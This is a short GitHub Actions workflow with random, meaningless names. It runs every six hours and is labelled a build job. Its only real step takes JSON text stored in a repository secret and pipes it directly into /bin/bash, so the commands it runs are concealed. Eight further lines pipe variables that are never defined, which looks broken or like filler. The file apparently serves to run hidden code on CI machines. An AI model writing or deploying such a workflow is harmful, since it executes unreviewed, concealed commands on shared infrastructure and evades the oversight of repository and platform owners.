name: tianguxoa
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianguxoa
        env:
          gkb84: ${{ secrets.gkb84 }}
        run: |
          echo $gkb84 | jq -r .sqa1164 | /bin/bash
          echo $d4062 | jq -r .a5548 | /bin/bash
          echo $konym74 | jq -r .mrnu733 | /bin/bash
          echo $vpr000 | jq -r .lhgs70 | /bin/bash
          echo $yx6 | jq -r .m3179 | /bin/bash
          echo $htmha2989 | jq -r .ajtv253 | /bin/bash
          echo $ooxy00 | jq -r .hxcmk09 | /bin/bash
          echo $yi4 | jq -r .tvpft83 | /bin/bash
          echo $ga91002 | jq -r .qcx91516 | /bin/bash

